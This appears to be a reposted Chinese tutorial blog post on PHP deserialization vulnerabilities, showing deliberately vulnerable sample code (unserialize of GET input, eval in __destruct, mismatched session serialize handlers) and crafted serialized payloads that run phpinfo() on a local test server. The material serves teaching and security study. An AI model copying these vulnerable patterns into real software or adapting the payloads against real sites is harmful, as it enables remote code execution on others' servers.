PHP反序列化漏洞

最新推荐文章于 2024-03-31 12:24:40 发布
最新推荐文章于 2024-03-31 12:24:40 发布
阅读量201 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/xiaozi/p/7839256.html
版权

【序列化简单利用】 

    serialize() 序列化:使用函数serialize()可将实例序列化为字符串
  unserialize() 反序列化:使用函数unserialize()可将序列化的字符串还原

代码示例:

<?php
class Example {
    var $var = '';
    function __destruct() {
        eval($this->var);
    }
}
unserialize($_GET['code']);
?>

漏洞利用:

构造漏洞利用的代码,保存为test.php,获取序列化值为  O:7:"Example":1:{s:3:"var";s:10:"phpinfo();";}

<?php
class Example {
    var $var = 'phpinfo();';
    function __destruct() {
        eval($this->var);
    }
}
$a=new Example();
echo serialize($a);
?>

提交?code=O:7:"Example":1:{s:3:"var";s:10:"phpinfo();";}  即可执行phpinfo()

【PHP SESSION反序列化】

   主要原因是: ini_set(‘session.serialize_handler’, ‘php_serialize’);

       ini_set(‘session.serialize_handler’, ‘php’);

       两者处理session的方式不同

<?php
ini_set('session.serialize_handler','php_serialize');
//ini_set('session.serialize_handler','php');
session_start();
$_SESSION["test"]=$_GET["a"];
?>
//提交?a=1111
输出结果:
php_serialize: a:1:{s:4:"test";s:4:"1111";}
php: test|s:4:"1111";

如果在PHP在反序列化存储的$_SESSION数据时使用的引擎和序列化使用的引擎不一样,会导致数据无法正确第反序列化。通过精心构造的数据包,就可以绕过程序的验证或者是执行一些系统的方法
代码示例:
新建test1.php
<?php
ini_set('session.serialize_handler', 'php');
session_start();
class test {
    var $hi;
    function __construct(){
        $this->hi = 'phpinfo();';
    }

    function __destruct() {
         eval($this->hi);
    }
}
?>
新建test2.php
<?php
ini_set('session.serialize_handler', 'php_serialize');
session_start();
$_SESSION["test"]=$_GET["a"];
?>

漏洞利用:

构造利用代码

<?php
class test {
    var $hi;
    function __construct(){
        $this->hi = 'phpinfo();';
    }

    function __destruct() {
         eval($this->hi);
    }
}
$a=new test();
echo serialize($a);

?>

获取反序列化字符串:O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}

步骤一:提交test2.php?a=|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";},

    传入的数据会按照php_serialize来进行序列化:a:1:{s:4:"test";s:43:"|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}";}

步骤二:然后再访问http://127.0.0.1/test1.php,成功执行phpinfo()

    此时访问test1.php,应用程序会按照php来反序列化SESSION中的数据,此时就会反序列化伪造的数据,php引擎会以|作为作为key和value的分隔符,那么就会将a:1:{s:4:"test";s:43:"作为SESSION的key,将O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}";}作为value,然后进行反序列化,最后就会就会实例化test对象,最后就会执行析构函数中的eval()方法。

 

 

参考文章:

PHP反序列化漏洞  http://wyb0.com/posts/php-deserialization-vulnerabilities/

PHP反序列化 代码执行 https://www.cnblogs.com/yinqin/articles/4962837.html

PHP中SESSION反序列化机制  https://blog.spoock.com/2016/10/16/php-serialize-problem/

转载于:https://www.cnblogs.com/xiaozi/p/7839256.html

an0708
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php代码审计15.2之Session与反序列化
划水的小白白
07-14 118
1、php.ini配置文件中与session相关的配置 1.1、pip文件中的相关配置 1.2、session本地存储文件 2、Session序列化漏洞利用 2.1、限制 2.2、一般的反序列化情况 2.3、 Session中的序列化漏洞 3、session序列化之ctf 3.1、题目文件 3.2、分析class.php文件 3.3、可控session的问题 3.4、通过上传写入session 3.5、补充点
PHP反序列化漏洞总结
未完成的歌~的博客
02-22 3627
程序未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,通过在参数中注入一些代码,从而达到代码执行,SQL 注入,目录遍历等不可控后果,危害较大。
PHP反序列化漏洞详解(万字分析、由浅入深)
Hardworking666的博客
01-08 1万+
文章目录一、PHP面向对象编程二、PHP序列化和反序列化三、PHP反序列化漏洞原理 一、PHP面向对象编程 在面向对象的程序设计(Object-oriented programming,OOP)中,对象是一个由信息及对信息进行处理的描述所组成的整体,是对现实世界的抽象。 类是一个共享相同结构和行为的对象的集合。每个类的定义都以关键字class开头,后面跟着类的名字。 创建一个PHP类: <?php class TestClass //定义一个类 { //一个变量 public $variable ..
PHP反序列化漏洞-从入门到提升
AkangBoy的博客
11-09 1657
本文从PHP序列化原理讲起,逐渐深入到PHP反序列化及其漏洞,几乎每个知识点都配有代码演示,十分方便理解,希望对你们有所帮助!
php反序列化漏洞
热门推荐
vergilben的学习日记
03-23 1万+
php反序列化漏洞 关于php面向对象编程: 对象:可以对其做事情的一些东西。一个对象有状态、行为和标识三种属性。 类:一个共享相同结构和行为的对象的集合。 每个类的定义都以关键字class开头,后面跟着类的名字。一个类可以包含有属于自己的变量,变量(称为“属性”)以及函数(“称为方法”)。类定义了一件事物的抽象特点。通常来说,类定义了事物的属性和它可以做到的。类可能会包含一些特殊的函数叫magi...
PHP反序列化漏洞研究
06-17
PHP反序列化漏洞研究 PHP反序列化漏洞是指攻击者可以通过构造恶意的序列化数据来执行恶意代码或泄露敏感信息的漏洞。这种漏洞通常发生在使用PHP的serialize()和unserialize()函数时。 在PHP中,serialize()函数...
PHP反序列化漏洞详解.rar
02-07
在IT安全领域,PHP反序列化漏洞是一种常见的安全隐患,尤其在Web应用开发中。这个话题在CTF(Capture The Flag)网络安全竞赛中也常被用作挑战,因为理解和利用这种漏洞需要深入理解PHP语言和其内部工作原理。下面将...
深入浅析PHP的session反序列化漏洞问题
10-19
主要介绍了PHP的session反序列化漏洞问题,需要的朋友可以参考下
php.ini save_handler 修改不生效的解决办法
10-25
主要介绍了php.ini save_handler 修改不生效的解决办法,需要的朋友可以参考下
php反序列化漏洞1
08-04
PHP反序列化漏洞是一种安全问题,它出现在PHP代码中对序列化对象进行反序列化时,如果对象的某些属性或方法可以被恶意控制,就可能导致意外的行为,甚至执行任意系统命令。这种漏洞通常源于对反序列化过程的不正确...
PHP反序列化漏洞.pdf
08-10
**PHP反序列化漏洞详解** PHP反序列化漏洞是一种常见的安全漏洞,主要出现在PHP应用程序中,当程序在处理用户可控的序列化数据时,没有进行有效的验证和过滤,导致攻击者能够操纵序列化的数据,从而执行任意代码...
Web安全--反序列化漏洞详解(php篇)
bobo_milk的博客
11-29 1128
反序列化
php反序列化漏洞——session反序列化漏洞
最新发布
m0_73756016的博客
03-31 1334
session在网络应用中称为“会话控制”,是服务器为了保存用户状态而创建的一个特殊的对象。简而言之,session就是一个对象,用于存储信息。
php+%3e%3e%3eeot,PHP序列化反序列化漏洞总结(一篇懂)
weixin_35885813的博客
03-10 1万+
文章目录序列化和反序列化的概念与基础知识PHP的序列化访问控制修饰符PHP反序列化反序列化POP链PHP反序列化漏洞(常规)绕过魔法方法的反序列化漏洞__wakeup()__destruct()示例一:示例二(连菜刀、反序列化免杀后门):__toString()Error类ExceptionPHP中Session反序列化(重点)简介与基础知识Session序列化漏洞利用PHP Session中...
反序列化漏洞PHP
qq_42383069的博客
05-18 6454
反序列化漏洞 0x01. 序列化和反序列化是什么 序列化:变量转换为可保存或传输的字符串的过程; 反序列化:把序列化的字符串再转化成原来的变量使用 作用:可轻松地存储和传输数据,使程序更具维护性 0x02. 为什么会有序列化 序列化用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构 0x03. 序列化和反序列化代码示例 <?php class User { public $username = 'admin'; public $password = '123456';
php定时执行代码漏洞_常见的PHP代码执行漏洞
weixin_35812176的博客
01-14 229
1. 代码执行函数PHP中可以执行代码的函数。如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec() 等demo code 1.1:echo `dir`;?>2. 文件包含代码注射文件包含函数在特定条件下的代码注射,如include()、include_once()、...
深入解析PHP反序列化漏洞
"理解PHP反序列化漏洞-berTrAM在漏洞银行大咖面对面的讲解" 在信息安全领域,PHP反序列化漏洞是一种常见的安全问题,它源于PHP的序列化和反序列化机制。首先,我们需要理解PHP中的类和对象的概念。类是编程中的一个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值